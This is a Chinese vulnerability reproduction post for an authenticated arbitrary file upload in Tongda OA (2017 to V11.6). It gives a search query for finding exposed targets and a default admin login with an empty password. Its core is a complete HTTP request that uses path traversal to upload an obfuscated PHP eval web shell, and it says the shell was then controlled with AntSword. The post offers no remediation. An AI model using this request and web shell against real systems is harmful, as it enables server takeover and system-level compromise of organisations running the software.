登录 白背景

通达OA utils存在后台任意文件上传

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,后台/general/data_center/utils/upload.php存在任意文件上传漏洞,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。

二、影响版本

  • 通达OA2017 -通达OAV11.6

三、资产测绘

  • hunterapp.name="通达 OA"

image.png

  • 登录页面

image.png

四、漏洞复现

  1. 使用默认密码admin,密码为空或采用通达OA任意用户登录登录后台;

image.png

  1. 通过获取的cookie上传文件
POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1
Accept-Charset: GBK
Cookie: PHPSESSID=bdvsg4irn4bm2c34s9pr86kr35;_SERVER=
Cache-Control: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.7 Safari/537.36
Connection: close
Pragma: no-cache
Content-Type: multipart/form-data; boundary=********
Host: xx.xx.xx.xx
Content-Length: 225

--********
Content-Disposition: form-data; name="FILE1"; filename="shell1.php"

<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['x']);?>
--********

image.png

  1. 上传文件位置:http://xx.xx.xx.xx/_shell.php,使用蚁剑成功连接

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/abemqxq2sybovp5y